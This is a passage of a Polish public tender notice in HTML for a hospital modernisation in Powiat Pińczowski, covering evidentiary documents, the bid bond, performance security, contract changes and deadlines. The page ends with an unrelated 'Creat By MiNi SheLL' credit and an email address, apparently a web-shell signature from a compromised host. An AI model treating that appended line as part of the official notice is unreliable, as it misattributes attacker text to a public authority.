Zamawiającego podmiotowych środków dowodowych, o których mowa w powyżej, Wykonawca składa inne podmio-towe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez Za-mawiającego warunku udziału w postępowaniu lub kryterium selekcji dotyczącego sytuacji ekono-micznej lub finansowej.<br/><br/>4.	Poleganie na zasobach innych podmiotów:<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączącego go z nimi stosunków prawnych.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświad-czenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli pod-mioty te wykonują w ramach zamówienia roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, skła-da, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek do-wodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 3, potwierdza, że stosu-nek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udo-stępniającego te zasoby przy wykonywaniu zamówienia;<br/>	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <br/>5.	Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3) i 4), a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zo-stały przewidziane względem Wykonawcy.<br/>6.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających za-soby, przedstawia, wraz z własnym oświadczeniem, także oświadczenie podmiotu udostępniające-go zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, zgodnie z katalogiem dokumentów określonych w niniejszym rozdziale.<br/>7.	W przypadku gdy Wykonawca korzysta z podwykonawców, na których zasoby Wykonawca powoływał się, w celu wykazania spełnienia warunków udziału w postępowaniu określonych w SWZ, Wykonawca zobowiązany jest w przypadku zmiany lub rezygnacji z podwykonawcy wykazać Za-mawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenia zamówienia. Zamawiający będzie badał czy zachodzą podstawy wykluczenia względem nowego podwykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.1. oświadczenie o spełnianiu warunków udziału w postępowaniu oraz oświadczenie o braku podstaw do wykluczenia z postępowania – Załączniki nr 2 -3 i 3b do SWZ. <br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających za-soby przedstawia, wraz z oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowied-nio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby –Załączniki nr 2a i 3a do SWZ. <br/>1.3.	zobowiązanie podmiotu udostępniającemu zasoby w przypadku, gdy Wykonawca wykazując speł-nienie warunków udziału w postępowaniu polega na zdolnościach technicznych i/lub zawodowych, finansowych lub ekonomicznych sytuacji tego podmiotu - Załącznik nr 7 do SWZ,<br/>1.4.	pełnomocnictwo o którym mowa w rozdziale IX niniejszej SWZ,<br/>1.5.	w przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie stanowiące Załącznik nr 6 do SWZ.<br/>2.1. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konku-rencji i konsumentów (Dz. U. z 2021r. poz. 275), z innym Wykonawcą, który złożył odrębną ofer-tę w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –Załącznik nr 8 do SWZ; <br/><br/>2.2. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Pzp<br/>zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakre-sie art. 109 ust. 1 pkt 1 Pzp, <br/>odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Pzp<br/>wykaz robót budowlanych określonych w Rozdziale V SWZ wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działal-ności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wyko-nania oraz podmiotów, na rzecz których roboty te zostały wykonane, <br/>wykaz osób wskazanych w Rozdziale V SWZ skierowanych przez Wykonawcę do realizacji za-mówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także za-kresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik nr 4 do SWZ<br/>2.5. dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywil-nej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimum kwo-tę określoną w Rozdziale V SWZ<br/>2.6. dokumentów potwierdzających posiadanie przez Wykonawcę środków finansowych lub zdol-ność kredytową na kwotę określoną w Rozdziale V SWZ<br/>2.	W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020r. oraz przepisy rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1. oświadczenie o spełnianiu warunków udziału w postępowaniu oraz oświadczenie o braku podstaw do wykluczenia z postępowania – Załączniki nr 2 -3 i 3b do SWZ. <br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających za-soby przedstawia, wraz z oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowied-nio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby –Załączniki nr 2a i 3a do SWZ. <br/>1.3.	zobowiązanie podmiotu udostępniającemu zasoby w przypadku, gdy Wykonawca wykazując speł-nienie warunków udziału w postępowaniu polega na zdolnościach technicznych i/lub zawodowych, finansowych lub ekonomicznych sytuacji tego podmiotu - Załącznik nr 7 do SWZ,<br/>1.4.	pełnomocnictwo o którym mowa w rozdziale IX niniejszej SWZ,<br/>1.5.	w przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie stanowiące Załącznik nr 6 do SWZ.<br/>2.1. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konku-rencji i konsumentów (Dz. U. z 2021r. poz. 275), z innym Wykonawcą, który złożył odrębną ofer-tę w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –Załącznik nr 8 do SWZ; <br/><br/>2.2. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Pzp<br/>zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakre-sie art. 109 ust. 1 pkt 1 Pzp, <br/>odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Pzp<br/>wykaz robót budowlanych określonych w Rozdziale V SWZ wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działal-ności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wyko-nania oraz podmiotów, na rzecz których roboty te zostały wykonane, <br/>wykaz osób wskazanych w Rozdziale V SWZ skierowanych przez Wykonawcę do realizacji za-mówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także za-kresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik nr 4 do SWZ<br/>2.5. dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywil-nej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimum kwo-tę określoną w Rozdziale V SWZ<br/>2.6. dokumentów potwierdzających posiadanie przez Wykonawcę środków finansowych lub zdol-ność kredytową na kwotę określoną w Rozdziale V SWZ<br/>2.	W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020r. oraz przepisy rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych 00/100) należy wnieść przed upływem terminu składania ofert i utrzymywać je nieprzerwanie do dnia upływu terminu zwią-zania ofertą, z wyjątkiem przypadków, o których mowa w ustawie Pzp.<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>	pieniądzu; wadium należy wnieść w PLN (złotych polskich).<br/>	gwarancjach bankowych;<br/>	gwarancjach ubezpieczeniowych;<br/>	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>	jeżeli wadium zostało wniesione w formie niepieniężnej dowód wniesienia wadium w orygina-le należy załączyć do oferty (poprzez wniesienie wadium w oryginale należy rozumieć prze-kazanie dokumentu w formie elektronicznej otrzymanej od podmiotu który zabezpieczenia wa-dialnego dokonał).<br/> gwarancję i poręczenia należy wystawić na Powiat Pińczowski.<br/>3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:<br/>Nr rachunku 17850900022001000001850002 z dopiskiem „modernizacja szpitala”<br/>4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>5.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wadium (w każdej z dopuszczalnych form) może być wniesione przez jednego, kilku lub wszystkich Wyko-nawców, pod warunkiem, iż łączna wysokość wniesionego wadium odpowiadać będzie wymaga-nej kwocie. W takim przypadku składając wadium należy wskazać w imieniu kogo i tytułem ja-kiego postępowania jest wnoszone.<br/>6.	Oferta Wykonawcy, który nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzy-mywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, określonym ustawą pzp - zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp. <br/>7.	Zamawiający zwraca wadium zgodnie z art. 98, z zastrzeżeniem art. 98 ust. 6 pkt.1 ustawy Pzp.<br/>8.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli:<br/>	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, <br/>z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przed-miotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświad-czeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3), co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniej-szej;<br/>	Wykonawca, którego oferta została wybrana: <br/>	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych <br/>w ofercie;<br/>	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; <br/>	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający żądać będzie od Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, wniesienia zabezpieczenia w wysokości 5 % ceny ofertowej. Wykonawca wniesie zabezpieczenie należytego wykonania umowy w jednej z poniższych form: <br/>	pieniądzu; (PLN)<br/>	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>	gwarancjach bankowych;<br/>	gwarancjach ubezpieczeniowych;<br/>	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>2.	Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w formach określonych w art. 450 ust. 2 ustawy Pzp.<br/>3.	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego. <br/>4.	W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwo-ty wadium na poczet zabezpieczenia. <br/>5.	Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone <br/>o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek ban-kowy Wykonawcy.<br/>6.	W przypadku zabezpieczeń składanych w formie pieniężnej, Zamawiający zwróci 70% wartości złożonego zabezpieczenia w terminie 30 dni od dnia wykonania zamówienia, natomiast pozostałe 30% wartości zostanie zwrócone w ciągu 15 dni po upływie okresu rękojmi za wady i gwarancji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Niedopuszczalna jest istotna zmiana umowy, tj. zmiana powodująca zmianę charakteru umowy pier-wotnej (art. 454 pzp).<br/>2.	Zmiana umowy wymaga formy pisemnej pod rygorem nieważności i może nastąpić za zgodą stron, w formie aneksu, chyba że umowa stanowi inaczej. Podstawę do zmiany umowy stanowił będzie proto-kół konieczności, sporządzony przy udziale obu ze stron. <br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie:<br/>3.1.	zmiany osób odpowiedzialnych za realizację umowy,<br/>3.2.	zmiany podwykonawców na zasadach określonych w umowie,<br/>3.3.	zmiany umowy w przypadkach określonych w art. 455 ust. 1 pkt 2 - 4 oraz 455 ust. 2 ustawy pzp,<br/>3.4.	zmiany sposobu wykonania przedmiotu zamówienia/ jego części:<br/>1.	wynikające z konieczności zmiany danych zwartych w OPZ, na podstawie których była sporządzona oferta i mających wpływ na realizację przedmiotu zamówienia, zwiększenia funkcjonalności lub doprowadzenia do zgodności z wymogami przepisów prawa,<br/>2.	wynikające z konieczności zastosowania innych rozwiązań technicznych, technologicznych lub materiałowych niż wskazane dokumentacji przetargowej w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia,<br/>3.5.	zmiana wynagrodzenia skutkująca:<br/>1.	zmniejszeniem wynagrodzenia w przypadku ograniczenia zakresu zamówienia ujętego w opisie przedmiotu zamówienia a jego ograniczenie nie spowoduje niemożność korzystania z przedmio-tu zamówienia w jakimkolwiek jego zakresie;<br/>2.	zwiększenia kosztów zamówienia na skutek rozszerzenia zakresu rzeczowego o elementy nie wskazane w OPZ lecz niezbędne dla prawidłowej realizacji przedmiotu zamówienia;<br/>3.	pomniejszenie lub podwyższenie wynagrodzenia nastąpi w oparciu kosztorys różnicowy powsta-ły na bazie kosztorysu ofertowego, w zakresie robót tam niewymienionych stawki maksymalnie 90% cen SEKOCENBUD za ostatni zakończony kwartał przed miesiącem rozliczenia;<br/>4.	zmiany w /w nie powodują zmiany terminu realizacji umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-12 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1	Cena brutto	60%<br/>2	Wydłużony okres udzielonej gwarancji jakości 20%<br/>3	Skrócony okres realizacji 20%

Creat By MiNi SheLL
Email: jattceo@gmail.com